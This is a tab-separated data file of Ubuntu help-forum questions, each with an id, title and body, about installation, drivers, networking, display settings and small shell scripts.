438866	installed12.04 lts 64-bit results in 32-bit os	i installed unbuntu 12.04 lts 64-bit on my dell 8500-xps . this was a side-by-side install with windows 7 64-bit . my system has 16 gig ram . when i check my unbutu system settings - details , it says my os type is 32-bit . what happened ? output of uname -a : 3.11.0-18-generic # 32~precise1-ubuntu smp thu feb 20 17:54:21 utc 2014 i686 i686 i386 gnu/linux output of uname -m : i686
438867	problem with laptop dell 3537 : the wifi stop working	i bought a laptop dell 3537 . i make the updates and after that the wifi stops working . this is my wifi card : 02:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) i installed the drivers from other answers but it did not work . what i must do ? thanks .
438871	how to restart openstack services after restart/logout ?	i have successfully configured openstack following this tutorial . the problem is that when i logout of my system or restart , and then try to access the openstack dashboard , it says page not found . it seems that openstack is not started . i want to know what are the commands to run openstack 's services ?
438873	virtualization solution ?	i am new in ubuntu , i am using virtualization for my final project and using ubuntu server 12.04 as a platform . i have installed the server but i do n't know how to install other tools i need to complete the virtualization .
438874	acer aspire one 725	i recently got an acer aspire one 725 and i want to install ubuntu on it . i tried ubuntu 13.10 32-bit and 64-bit , but i got a lot of errors , and it is running a little slowly . has anyone tried to install ubuntu on this netbook which i prefer ? please help , it will be very helpful ! here is a link to my netbook 's specifications .
438875	can not load ubuntu 12.04 nor 13.10	i have a 6 year old computer running windows xp that i want to switch to ubuntu linux only . however neither the install disk ( dvd ) for 12.04 nor 13.10 will recognize the existing hard drive with windows xp nor a new empty ssd on which i want to install ubuntu.this a problem that i have never before encountered on any other computer . the motherboard is an xfx board with both sata2 and ide connections . the hard drive and ssd are sata and the dvd r/w is ide . the computer also has a scsi card which i use with a film scanner and an 11 x 14-inch flatbed scanner . just in case the bios on the scsi card was causing a problem , i removed the scsi card . no difference . i have read a number of cases where individuals have had a similar problem and tried the solutions suggested . none worked . i installed ubuntu 13.10 on to a usb thumb drive using another computer and booted the xfx board from that thumb drive . it booted and ran ok albeit very slowly . still linux did not recognize either the ssd nor the hard drive . i removed the ssd from the computer , connected that ssd to another computer and installed 12.04 to that drive . next i reinstalled the ssd to a sata port in the xfx based computer ( only drive installed now ) . the computer would not recognize the ssd . next i connected the ssd to a usb port using an adapter . the computer booted just fine off the usb connected ssd . i am using the computer now . question : how can i get ubuntu 12.04 to recognize drives connected to sata ports ? ? any suggestions ? thank you , bill
438877	ca n't install to dual-boot ubuntu 12.04 lts and windows 7 , says `` restart to continue ''	i ca n't install ubuntu because it says `` restart to continue '' on the selection `` install ubuntu inside freedos '' . how do you solve this kind of problem ? afaik that should be `` install ubuntu alongside windows 7 '' ps : i 'm trying to dual boot windows 7 and ubuntu but it says `` freedos '' i do n't know what is it . pss : i ca n't upload the image , i do n't have enough reputation points
438878	school management software on ubuntu	can anybody suggest software that runs on ubuntu to manage a high school . software would need to hold a database of students as well as generating reports based on marks entered . please provide links
438881	ubuntu power button ?	i have a problem i want to change power button 's location instead of right side i want it to be on left side is it possible i want to look it like mac please help me . please if it is possible to change location of power button please help me
438883	how to create symbolic link to a directory excluding certain files ?	i want to create a symbolic link from my home directory to dropbox , excluding videos . this is what i know : ln -s /home/pt/ '/home/pt/dropbox' what should i do ? what will happen if i 'd like to delete the symbolic link ?
438887	associating a keyword to an application in unity launcher	i have had this issue with a couple of different applications , but i will use ghex as my example . the problem ghex is a hex editor that i use to investigate files from time to time , i dont use it very often , but occasionally i do ... the problem is , when i hit the super key and type into the launcher `` hex '' i would expect that ghex would appear as an option , but it does n't . if i start typing `` gh '' then ghex is there ... why this is an issue.. i use it infrequently enough that i forget the applications name , and forget that i have to type the g. my question can i associate keywords to applications in the launcher so that they are better `` indexed '' and more findable/accessible ? system details ubuntu 12.04 lts ( ca n't think of any other relevant details ... ) thank you in advanced !
438890	how to edit/add/delete/rename files/folders in ubuntu server using filezilla ?	i am using `` ubuntuserver13.10 '' on my server and `` windows7-sp1 '' on my pc . now i want to edit , add , delete , rename my files and folders in server using ftp . for this purpose , i installed `` filezilla 3.7.4.1 win32 '' in my pc and then try to connect my server though using it . i added my internal server ip ( sftp : //192.168.1.99 ) and my username ( ubuntu username not root ) and password and added port22 . after this i was able to see my server files on filezilla but not able to edit , add , delete , rename my files and folders in server using filezilla . when i try to add files then get `` open for write : permission denied '' and when try to delete file get `` permission denied '' . now my main question is that `` how to edit/add/delete/rename files/folders in ubuntu server using filezilla ? '' . waiting for your reply ...
438893	laptop shuts down immediately upon starting game from steam	i have just reformatted ubuntu , and have updated the drivers . games from steam crash and the computer shuts down immediately upon loading or starting the game . this happens both on windows 7 and ubuntu . i have 6gb ram gt 630m graphics card core i5 -2450m 2.5ghz cpu ( acer v3 771g 6601 ) games like l4d2 and tf2 shut down the computer instantly . is it a hardware malfunction ? according to the specs it can handle those games easily . help please !
438894	fail to install the synaptics touchpad driver	i am using ubuntu12.04lts+vmware 10 and try to install the synaptics touchpad driver using sudo apt-get install xserver-xorg-input-synaptics , it fails and get following info : the following packages have unmet dependencies : xserver-xorg-input-synaptics : depends : xorg-input-abi-16 depends : xserver-xorg-core ( > = 2:1.10.99.901 ) e : unable to correct problems , you have held broken packages . how to solve it ? thank you indeed .
438895	firefox for ubuntu add-ons	i am considering to install ubunta on my pc . currently also have firefox for windows installed with a number of add-ons . are those same add-ons available under ubuntu ?
438900	how do i replace the tpm driver with my own version	i 'm new to linux . my goal is to load my own tpm driver . i 'm using ubuntu 12.04 lts with kernel 3.13.7 . how do i remove the current driver ( especially tpm_tis ) ? how do i make my own ( command-wise ) and load it ? thanks !
438901	how can i prevent anything from happening when i shut the lid of my laptop ?	i have a laptop running 12.04 server edition , and i 'd like to be able to shut the lid without anything happening . i need it to remain pingable and sshable and continue to run all of its daemons and everything after the lid is closed . remember , no gui conf utilities , because this is server edition , with no x server installed . thanks .
438903	only administrator user can execute some commands	i am using ubuntu 12.04 lts edition 32 bit and now these days i am working on ubuntu customization . my customization os having 2 users as follows : administrator with full permission . net user ( standard user ) with limited permission . now i am installing some external packages and commands and now i want that my net user could n't access them . any idea ?
438904	ubuntu kills graphics	after installing ubuntu on my siemens lifebook without any problems i have no display anymore . there is only a white field wit a light blue and dark blue stripe at the right side of the monitor . computer does n't work further . before i used win xp without problems . i made a complete installation of ubuntu erasing all data from harddisk . what 's to do ? ( if possible give me answer in german )
438906	xubuntu 12.4 does not save any desktop settings	this is getting annoying that my xfce desktop on a xubuntu 12.4 fresh installation does not store any of my desktop modification to its settings , for example i 've added keyboard layout widget to the top panel and added alternative language and keyboard shortcut to trigger the language change , or in another case i 've modified the settings in `` gmusicbrowser '' to jump to tray icon on close , but none of these setting modifications are remembered for the next xfce session . what am i missing ? thanks .
438907	unable to download/ save audio files- i can only listen but not save the file	i am unable to save/ download audio files . i am using firefox browser on ubuntu os and all these days did not have a problem downloading audio files . since the last software update ... .i am unable to download or save files . please help .
438909	how to backup all the updates	is there any way to create an updated fresh iso of installed ubuntu of my system so that i dont need to update all those package next time afte a fresh installation . if there please help me
438910	does evernote update when installed under wine ?	i am considering to install ubuntu on my pc . evernote is an essential , irreplaceable app for me , & i only use the desktop client because all my notes are local . i learned that evernote for windows can be installed under wine & while some people have hit glitches others have reported to have no probs . assuming a no probs situation , do the updates that the evernote team put out come through when using en under wine ?
438914	no animations in compizconfig settings manager under macbuntu	i have already looked at this question - no animation options showing in compizconfig settings manager but it did n't resolve my issue . i 'm running macbuntu . is there any way that i can use animations with macbuntu still installed ?
438919	getting errors when updating the source list	recently i installed kali and bt5 tools on my ubuntu 12.04 . at that i edited source.list file . when i issue sudo apt-get update it is exiting showing errors occured and they are ignored . what can be the problem for this ? ? i hope following last lines of the output will be informative . hit http : //in.archive.ubuntu.com precise-backports/universe translation-en fetched 515 kb in 38s ( 13.3 kb/s ) w : failed to fetch http : //64.repository.backtrack-linux.org/dists/revolution/release unable to find expected entry 'main/binary-i386/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . shivkesh @ keshav : ~ $
438923	get error when installing comodo antivirus	$ sudo dpkg -i cav-linux_1.1.268025-1_amd64.deb selecting previously unselected package cav-linux . ( reading database ... 333566 files and directories currently installed . ) unpacking cav-linux ( from cav-linux_1.1.268025-1_amd64.deb ) ... dpkg : dependency problems prevent configuration of cav-linux : cav-linux depends on libssl0.9.8 ( > = 0.9.8m-1 ) ; however : package libssl0.9.8 is not installed . dpkg : error processing cav-linux ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : cav-linux
438925	errors when build android source code on ubuntu	i am trying to build android source tree ( cis ) , however i met some errors . i am using ubuntu 12.04 , 64 bits . i 've get through several errors , but i ca n't find the solution to this one . incompatible /usr/lib/libgl.so when searching for -lgl /usr/bin/ld : can not find -lgl collect2 : ld returned 1 exit status make : *** [ out/host/linux-x86/obj/lib/libgles_v2_translator.so ] error 1 make : *** waiting for unfinished jobs ... . collect2 : ld returned 1 exit status make : *** [ out/host/linux-x86/obj/lib/libgles_cm_translator.so ] error 1 /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../libgl.so when searching for -lgl /usr/bin/ld : skipping incompatible /usr/lib/libgl.so when searching for -lgl /usr/bin/ld : can not find -lgl collect2 : ld returned 1 exit status make : *** [ out/host/linux-x86/obj/lib/libegl_translator.so ] error 1 does anyone have any ideas ? thank you ! i found this suggestion on the website : sudo ln -s /usr/lib/i386-linux-gnu/mesa/libgl.so.1.20 /usr/lib/libgl.so but it does n't work , and there is no mesa folder under the i386-linux-gnu folder.t here is a mesa foler under x86_64-linux-gnu folder , which is incompatible ( like the errors before ) .
438928	how to know current status of recording device ?	i have a device that records the audio and video using ffmpeg . and i am using ubuntu 12.04 for that device , but i want to find out if the device is currently recording or if it is in idle state from command line . is there any ubuntu command to find the current status of device ?
438930	micromax mmx 400r	i have bought a 3g usb device micromax mmx 400r . modem was not detected in ubuntu 12.04 , and hence no internet connection was established , when connected via wire . this device can connect with internet both via wire and wireless . i am trying to connect this device via wire ( usb ) in order to save battery consumption of device . from terminal , following information was found : - x $ lsusb bus 003 device 003 : id 1c9e : f010 omega technology x $ usb-devices t : bus=03 lev=01 prnt=01 port=00 cnt=01 dev # = 3 spd=12 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1c9e prodid=f010 rev=01.00 s : manufacturer=longcheer incorporated s : product=pocket wireless router s : serialnumber=1234567890abcdef c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage x $ dmesg | grep tty [ 0.000000 ] console [ tty0 ] enabled x $ sudo wvdialconf /etc/wvdial.conf modem port scan < *1 > : s0 s1 s2 s3 s4 s5 s6 s7 modem port scan < *1 > : s8 s9 s10 s11 s12 s13 s14 s15 modem port scan < *1 > : s16 s17 s18 s19 s20 s21 s22 s23 modem port scan < *1 > : s24 s25 s26 s27 s28 s29 s30 s31 sorry , no modem was detected ! is it in use by another program ? did you configure it properly with setserial ? please read the faq at http : //alumnit.ca/wiki/ ? wvdial with regards , sukumar
438934	trackpad gestures problems	i have a clevo p150sm with a synaptics trackpad and i wish to have multi-touch gestures for expo , scale , show desktop , change view port , etc ... i am using ubuntu 13.10 with mate as a desktop environment and have synclient . i searched the web and found touchegg and i installed it from the repos and it did not work , then i tried to install it by the source and it did not work . touchegg runs on terminal and displays the information of the gestures but then if i make a gesture it does not do anything . an example i created a gesture for `` all '' to make a mouse click ( button 1 ) with 4 fingers i rebooted the pc logged in but it did nothing . ( i have the touchegg in the startup applications ) . does any one has touchegg working in ubuntu 13.10 ?
438936	keyboard and mouse stopped working at ubuntu desktop	managed to load up ubuntu 13.10 perfectly , then from nowhere when i start the computer , shortly before it hits the home screen all lights disappear from mouse and keyboard . keyboard works fine if i access the setup menu very new to linux and ubuntu , so please assume minimal knowledge : )
438937	managing software updates for a python web stack	i 'm running a 12.04 server which i use solely for django ( python ) web apps . i 'm using apache , postgresql and python . i do n't really know what i should be doing to maintain my server . obviously i 'm keen to keep it secure . how often should i be updating my stack and how should i go about it ? ( eg apt-get upgrade )
438938	using byobu , how do you split the screen when using putty ?	when running byobu , how do you split the screen when using putty ? pressing ctrl+f2 just prints a character in the terminal .
438939	scanning software	is there a scanning program which can replace the epson smart panel ? i 'm about to deinstall windows xp on my laptop and would like to know if there is an alternative to epson smart panel .
438940	any supported agp 8x cards on ubuntu 14.04 ?	i 've aquired an old desktop ( acer aspire t135 ) which currently has an nvidia geforce fx 5500 graphics card . i 've discovered that this card is unsupported by nvidia on any version of ubuntu after 12.04 so i 'm looking at alternatives . one that came up is the radeon 4670 but again this is unsupported by ati past 12.04 are there any 8x agp graphics cards that will work to their full abilities ( using either open-source or proprietary drivers ) in 14.04 or am i looking at getting a new ( er ) pc ? if there are still some available - any suggestions on the best one ?
438950	change location of system menu indicatior to left .	i want to change location of that system menu indicator which is on the extreme right side to extreme left side of status bar . here is the sample : how can i do this ?
438951	confusion about command-line system install	i 'd like to install a command-line only version of ubuntu 12.04 , but i do not have clear which installation media i should use : i understood that the classical `` ubuntu desktop '' does not contain the cl option , but then i found different answers : 1 ) i should use the ubuntu server version ( ubuntu 12.04.3 lts installation mode `` install a command-line system '' missing ? ) 2 ) no wait , the server install cd provides a simple command line system , but it is not the same as `` install a command-line system '' and therefore i should use the `` alternate cd '' version ( https : //help.ubuntu.com/community/installation/lowmemorysystems ) 3 ) no , no , wait , the ubuntu alternate installer still installs the ubuntu-desktop package ( what are the differences between desktop , server , and alternate installs ? ) so which version do i need for a command-line system ? server or alternate ? thanks for the help !
438952	ubuntu 13.10 realtek r8168 problem	so if searched far and wide and already installed the newest driver version 038 from the realtek website but i still can not connect to my network using dhcp . i would be really grateful for some suggestions how to fix this problem ? ! i 'm running ubuntu 13.10 on a samsung series 9 900x3c with a realtek r8168 ethernet controller . the output of lshw -c network *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 06 serial : e8:03:9a : a6:07:75 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8168 driverversion=8.038.00-napi duplex=full latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:45 ioport:2000 ( size=256 ) memory : f0404000-f0404fff memory : f0400000-f0403fff and obviously the syslog extract : mar 25 12:12:25 thor dhclient : listening on lpf/eth1/e8:03:9a : a6:07:75 mar 25 12:12:25 thor dhclient : sending on lpf/eth1/e8:03:9a : a6:07:75 mar 25 12:12:25 thor dhclient : sending on socket/fallback mar 25 12:12:25 thor dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 3 ( xid=0x240c0b64 ) mar 25 12:12:29 thor dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 5 ( xid=0x240c0b64 ) mar 25 12:12:34 thor dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 13 ( xid=0x240c0b64 ) mar 25 12:12:47 thor dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 8 ( xid=0x240c0b64 ) mar 25 12:12:55 thor dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 12 ( xid=0x240c0b64 ) mar 25 12:13:07 thor dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 19 ( xid=0x240c0b64 ) mar 25 12:13:10 thor networkmanager [ 1342 ] : < warn > ( eth1 ) : dhcpv4 request timed out . mar 25 12:13:10 thor networkmanager [ 1342 ] : < info > ( eth1 ) : canceled dhcp transaction , dhcp client pid 4291 mar 25 12:13:10 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... mar 25 12:13:10 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) started ... mar 25 12:13:10 thor networkmanager [ 1342 ] : < info > ( eth1 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] mar 25 12:13:10 thor networkmanager [ 1342 ] : < warn > activation ( eth1 ) failed for connection 'wired connection 1 ' mar 25 12:13:10 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) complete . mar 25 12:13:10 thor networkmanager [ 1342 ] : < info > ( eth1 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] mar 25 12:13:10 thor networkmanager [ 1342 ] : < info > ( eth1 ) : deactivating device ( reason 'none ' ) [ 0 ] mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > auto-activating connection 'wired connection 1 ' . mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) starting connection 'wired connection 1 ' mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > ( eth1 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) successful . mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) scheduled . mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) started ... mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > ( eth1 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > dhclient started with pid 4316 mar 25 12:13:13 thor networkmanager [ 1342 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) complete . thanks a lot in advance !
438953	execute local bash script in remote machine using expect	i have local shell script . now , i want to run this local script in remote machine . of course i can use ssh , but as it ( the local shell script ) should be like an automated one , it should n't ask for password to enter manually . so i used expect to eliminate that problem , so that if i run the script it wont ask password . and my script looks like below . # ! /usr/bin/expect spawn ssh -o gssapiauthentication=no root @ 10.3.0.39 'bash -s ' < /path/to/localscript expect -timeout 7 `` * ( yes/no ) ? '' { send `` yes\r '' ; exp_continue } expect -timeout 3 `` *d : `` send `` qbcrootpass\n '' interact but it is not working . please note , in my scenario , i do n't want to use public key authentication . please help me to execute a local script in a remote machine using using expect .
438956	ca n't find optimal screen resolution	since a week i am a ubuntu user . switched from windows since my paid xp license is not supported anymore . iá¸ż really satisfied about ubuntu , works perfectly ! just one small problem , that 's my screen resolution . i 'm using a iiyama prolite e1902wsv monitor on ubuntu 12.04 lts when i put the code xrandr in the terminal , i get the following : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga-1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 dvi-d-1 disconnected ( normal left inverted right x axis y axis ) tv-1 disconnected ( normal left inverted right x axis y axis ) and now the problem starts , becouse the optimal screen resolution for my iiyama is n't in this list . i 've looked around on the internet and the best resolution should be 1440x900 ( source ) does anybody know how to fix this ? thanks in advance ! : : : edit : : : after the solution from sylvain pineau i started my computer this morning and got the following message . none of the selected modes were compatible with the possible modes : trying modes for crtc 143 crtc 143 : trying mode 1024x768 @ 60hz with output at 1440x900 @ 60hz ( pass 0 ) crtc 143 : trying mode 800x600 @ 60hz with output at 1440x900 @ 60hz ( pass 0 ) crtc 143 : trying mode 800x600 @ 56hz with output at 1440x900 @ 60hz ( pass 0 ) crtc 143 : trying mode 848x480 @ 60hz with output at 1440x900 @ 60hz ( pass 0 ) crtc 143 : trying mode 640x480 @ 60hz with output at 1440x900 @ 60hz ( pass 0 ) crtc 143 : trying mode 1024x768 @ 60hz with output at 1440x900 @ 60hz ( pass 1 ) crtc 143 : trying mode 800x600 @ 60hz with output at 1440x900 @ 60hz ( pass 1 ) crtc 143 : trying mode 800x600 @ 56hz with output at 1440x900 @ 60hz ( pass 1 ) crtc 143 : trying mode 848x480 @ 60hz with output at 1440x900 @ 60hz ( pass 1 ) crtc 143 : trying mode 640x480 @ 60hz with output at 1440x900 @ 60hz ( pass 1 ) trying modes for crtc 144 crtc 144 : trying mode 1024x768 @ 60hz with output at 1440x900 @ 60hz ( pass 0 ) crtc 144 : trying mode 800x600 @ 60hz with output at 1440x900 @ 60hz ( pass 0 ) crtc 144 : trying mode 800x600 @ 56hz with output at 1440x900 @ 60hz ( pass 0 ) crtc 144 : trying mode 848x480 @ 60hz with output at 1440x900 @ 60hz ( pass 0 ) crtc 144 : trying mode 640x480 @ 60hz with output at 1440x900 @ 60hz ( pass 0 ) crtc 144 : trying mode 1024x768 @ 60hz with output at 1440x900 @ 60hz ( pass 1 ) crtc 144 : trying mode 800x600 @ 60hz with output at 1440x900 @ 60hz ( pass 1 ) crtc 144 : trying mode 800x600 @ 56hz with output at 1440x900 @ 60hz ( pass 1 ) crtc 144 : trying mode 848x480 @ 60hz with output at 1440x900 @ 60hz ( pass 1 ) crtc 144 : trying mode 640x480 @ 60hz with output at 1440x900 @ 60hz ( pass 1 ) is there a solution to this aswell ? i have the same screen resolution as in the beginning 1024x768 ( 4:3 ) again ...
438957	problem while installing visual paradigm uml tool ?	i want to install visual paradigm community edition on ubuntu 13.10 . i follow the instruction on here , but i can not understand it . using terminal : zeb @ zeb-lenovo-b570 : ~ $ sudo -s root @ zeb-lenovo-b570 : ~ # '/home/zeb/desktop/visual_paradigm_for_uml_ce_linux_11_0_20140308.sh ' -c bash : /home/zeb/desktop/visual_paradigm_for_uml_ce_linux_11_0_20140308.sh : permission denied i also follow instruction installing visual paradigm for uml on linux and unix , it give : zeb @ zeb-lenovo-b570 : ~ $ bash ./ % visual_paradigm_for_uml_ce_linux_11_0_20140308.sh % bash : ./ % visual_paradigm_for_uml_ce_linux_11_0_20140308.sh % : no such file or directory can anybody tell me the proceedure that how to install visual paradigm tool on ubuntu 13.10 ?
438959	why update softwares before upgrading to next version ?	i am using ubuntu 13.10 now . i am willing to update my os into 14.04 after it 's release . is it needed to update my softwares before updating to 14.04 . if it so , why ?
438960	nautilus error and system has become very slow	my system reported an error with nautilus . since then my system has slowed down tremendously and also ram usage has been high . firefox has also been slowed down . please advice on a suitable solution . p.s . i have also restarted the system twice but it has n't been helpful
438972	rediricting applications into virtual sinks	i want to separate sound from different applications , using virtual sinks , then mix them together into single output of my soundcard , all using pulseaudio . is there an option to do such thing ?
438975	how to upgrade mono develop v3.0.3.2 to v4	so , i am using mono develop v3.0.3.2 but unfortunately it gives an error when i try to carry out a project on vb.net produces an error like : thus i hope upgrading might solve the problem.i am using u13.10 . here it is : i need some help , seriously.please provide any other ideas to solve the problem . thanks , & any help is appreciated .
438978	weird name in terminal	when i open terminal i see a weird name in the console . its saying : wojtek @ wojtek-system-product-name does not have to be just wojtek , where wojtek it 's my user name .
438980	ubuntu 12.04 i removed an add-in video board and now i ca n't see anything with on-board video card	i am new to linux and ubuntu . i originally installed ubuntu 12.04 on a pc with an hdmi add-in video card . i pulled that card and connected directly to the on-board vga . when i boot , i see a gray screen , but nothing else . no pointer either . i 'm fairly sure it is booting because i can use left-shift to get to a recovery console . i tried running the following command : sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.bak ... but it denied permission . how do i make this work ?
438982	install xubuntu alongside windows 8 - efi	ok , the situation is the following : i have a new lenovo ideapad s4oo touch with windows 8 pre-installed and i want to install xubuntu in efi mode alongside windows 8 . i 've searched a lot about it in the internet but nothing answered my questions . i am completely lost with it . well , if i put my bootable usb ( i will install with a bootable usb with xubuntu ) and boot in efi mode ( secure boot and fast boot turned off ) the grub 2 screen appears and show me the options for install and try ( live usb ) . the live usb works fine . but , if i choose install , will the installer install and configure grub2-efi fine ? i do n't want to have a problem like i install normally but either only windows 8 boots or only xubuntu boots . what i want as answer is especifically the following : a good and clear guide to install xubuntu on my new laptop alongside windows 8 , both in efi mode without headaches ; and even a problem come , i have a procedure to try to solve it .
438983	grub rescue after installing ubuntu	today i tried updating ubuntu 13.04 to ubuntu 14.04 . the installtion went fine so i restarted my computer and it came up with a grub rescue > prompt ! i have no idea what to do and i am no linux pro ( in fact i first heard about it a week ago : ) ) . please help now i ca n't even access windows right now and i need to get some work done , please help !
438986	how to stop oracle java proccess ; eat internet bandwidth and processer	i installed oracle java 7 on ubuntu 12.04 32bit . when i check my internet bandwidth while do nothing on the internet in system monitor- > resource data is sent and received . when i look in process tab only java process is using cpu and increase its size . why this process uploading and downloading data and how it can be solved .
438987	backing up for syslog/dmesg/message to different folder	i have an assignment where i am required to back up the /var/log/dmesg , /var/log/syslog and /var/log/message to text files in a different folder such as the desktop . it will also create a file called execution.txt to record the date and time whenever the bash script is run . i do have this code that i 've written yet every time i run it , it gives me : ./bash.sh : line 7 : /var/log/dmesg : permission denied ./bash.sh : line 8 : /var/log/syslog : permission denied ./bash.sh : line 9 : /var/log/message : permission denied however , it does create these files on the desktop , but the message and dmesg files are empty . i was wondering if this is normal or have i done something wrong ? below is the code that i have written so far . any help would be appreciated . thanks ! # ! /bin/bash cat /var/log/dmesg l nl > > /home/administrator/desktop/dmesg cat /var/log/syslog l nl > > /home/administrator/desktop/syslog cat /var/log/message l nl > > /home/administrator/desktop/message echo ' ' > /var/log/dmesg echo ' ' > /var/log/syslog echo ' ' > /var/log/message date > > /home/administrator/desktop/execution.txt
438997	browser video not working , weird shape and colour	i have posted pics to show you what my browser videos is doing . it is only happening on videos streamed in browsers . it was n't always like this . vlc player works fine with saved files . i have tried mozilla and chrominium , both same problem . i have tried other suggestions . please help , thanks . mahn , new zealand . hi i have already tried all answers provided on this site already to me and i still have this problem . can anyone actually help ? someone marked this as a duplicate question . yet i can not find an answer .
438998	bootable usb - mac still useable	there is this tutorial on how to create a bootable usb stick here will it still start with osx if the usb stick is not plugged in ? because i do n't want to destroy osx , and i want to choose . or i have heard , that a software called bootcamp would let you choose , but i ca n't find an explanation what it actually does . would be nice , if , somebody could help me kamik423
439001	sudo : unable to resolve host	this makes it appear that my hostname if correct : ubuntu @ webserver : ~ $ hostname webserver below is the command i 'm running and the output : ubuntu @ webserver : ~ $ sudo hostname webserver sudo : unable to resolve host webserver here is what is in my /etc/hosts file : 127.0.0.1 localhost webserverl # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters ff02 : :3 ip6-allhosts here is what is in my /etc/hostname file : webserver i 'm needing to get this to work properly to use apache2 .
439007	how to get update-rc.d to order init scripts as defined in the lsb header	i 'm getting really frustrated trying to get some init scripts to work . i 've read up on lsb and the ubuntu man pages , and afaict , to get my init scripts to run at a specific point in the startup order , i should have to do no more than define the required-start , and x-start-before lsb headers in my script . however , on the ( 14.04b1 ) installation i 'm trying to get this working on , all update-rc.d does is place my scripts in their designated runlevels as [ sk ] 20name-of-my-script , and thus all scripts are executed at the same overal point in the boot sequence , ordered alphabetically among each other . i can not fathom why . here 's an example header : # ! /bin/sh # # # begin init info # provides : update-env-vars # required-start : $ local_fs $ remote_fs $ network $ named $ time $ syslog postfix mdadm-raid # required-stop : $ local_fs $ remote_fs $ network $ named $ time $ syslog postfix # should-start : $ syslog # x-start-before : pull-server-conf pull-application-code # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : update of environment variables # description : update /.env with static environment variables , plus dynamic # ones pulled from ec2 . # # # end init info however , /usr/sbin/update-rc.d update-env-vars defaults generates symlinks as s20update-env-vars and k20update-env-vars , respectively ( same order as for the rest of my scripts ) . this puts it after the pull-* scripts and before postfix and mdadm ... the only thing it 's doing the way i want it to , is to put the start and kill scripts symlinks at the right runlevels : ) i ca n't figure out what i 'm doing wrong , please help : ) thanks
